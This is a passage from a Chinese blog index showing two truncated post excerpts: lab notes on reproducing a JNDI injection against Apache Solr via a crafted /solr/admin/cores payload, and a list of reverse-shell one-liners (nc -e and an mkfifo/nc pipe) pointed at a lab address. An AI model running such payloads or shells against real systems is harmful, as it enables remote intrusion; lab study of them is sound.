摘要:
1.启动漏洞环境 2.通过dnslog验证漏洞 先获取一个subdomain 3.可利用/admin/cores传参 4.构造payload 访问 http://192.168.80.134:8983/solr/admin/cores?action=${jndi:ldap://${sys:java. 阅读全文
posted @ 2024-05-17 14:28
4A16
阅读(206)
评论(0)
推荐(0)
摘要:
Nc反弹shell nc -e 192.168.80.134 /bin/bash rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.80.134 4444>/tmp/f Python交互式shell python3 -c 'i 阅读全文
posted @ 2024-05-17 14:27
4A16
阅读(59)
评论(0)
推荐(0)

浙公网安备 33010602011771号